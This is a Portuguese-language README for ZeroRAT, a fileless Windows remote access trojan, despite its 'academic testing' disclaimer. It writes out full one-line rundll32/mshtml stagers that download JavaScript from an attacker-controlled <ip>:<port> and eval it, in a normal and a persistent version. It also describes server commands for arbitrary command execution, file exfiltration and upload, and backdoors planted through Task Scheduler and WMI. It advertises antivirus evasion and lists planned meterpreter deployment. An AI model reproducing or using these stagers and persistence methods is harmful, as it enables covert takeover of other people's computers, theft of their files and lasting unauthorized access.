
ZeroRAT é um RAT de uma única linha para Windows.
#ZeroRAT ##Introdução RAT (ferramenta de acesso remoto) para Windows. O cliente só precisa executar um único comando, utilizando programas nativos do Windows para execução, sem gravar arquivos no disco, com características naturalmente furtivas (evasão de antivírus). O efeito é perdido após a reinicialização.
No programa, download e upload são vistos da perspectiva do cliente. O cliente baixar um arquivo do servidor é chamado de download; o cliente enviar um arquivo para o servidor é chamado de upload.
##Configuração Modifique o endereço de conexão do cliente e a senha de administração do painel em config.py. Lembre-se de verificar se o modo debug está desativado.
O programa depende de flask e sqlite3; instale-os via pip por conta própria.
##Cliente
Substitua <ip>:<port> pelo endereço real de conexão.
Versão normal
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}
Versão persistente
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}
##Servidor
Painel administrativo: http://<ip>:<port>/server/
Os comandos suportados pelo servidor são:
sessions Lista os clientes ativosuse <id> Seleciona o cliente pelo idset <key> <value> Define variáveis globaisshow globals/downloads/uploads Exibe as variáveis globais, os arquivos que o cliente pode baixar e os arquivos enviados pelo clientedelete session Exclui o cliente atualdelete download/upload <id> Exclui o arquivo pelo idupfile Envia um arquivo para o servidor e o adiciona à lista de downloadsdownload Defina as variáveis download_file e download_save_path para que o cliente baixe o arquivo e o salve em download_save_pathupload Defina a variável upload_file para que o cliente envie o arquivo de upload_file para o servidorbackdoor tasks <time> Usa o Agendador de Tarefas do Windows para deixar um backdoor; formato de hora: 00:00backdoor wmi Usa WMI para deixar um backdoor, executado a cada horaAlém dos comandos acima, todo o resto é executado como comando do sistema Windows.
Para detalhes dos comandos, consulte /static/js/xkcd_cli.js
##Desenvolvimento Comandos do servidor que controlam o cliente: /static/js/xkcd_cli.js
Comandos do servidor que controlam o servidor: /controllers/server.py
Manutenção do cliente: /controllers/client.py
Geração do payload do cliente: payload.py
Operações relacionadas ao banco de dados: /models/
##Contato http://5alt.me
md5_salt [AT] qq.com
##Referências https://gist.github.com/subTee/f1603fa5c15d5f8825c0
http://drops.wooyun.org/tips/11764
http://drops.wooyun.org/tips/8290
http://drops.wooyun.org/tips/12354
https://github.com/chromakode/xkcdfools
http://www.kammerl.de/ascii/AsciiSignature.php
https://github.com/AlessandroZ/LaZagne
##Isenção de responsabilidade Ao usar esta ferramenta, respeite as leis locais. Use-a apenas para testes acadêmicos. É estritamente proibido controlar ilegalmente computadores de terceiros. Caso cause danos, o autor não se responsabiliza.
##Licença GPLV3
##TODO
meterpreter shellcode Implanta meterpreter via shellcode executado pelo InstallUtil; é necessário definir LHOST e LPORT primeiro (só volta a aceitar comandos após o migrate; depende do .NET Framework 2.0)meterpreter powershell Implanta meterpreter via Powershell (depende do Powershell 1.0)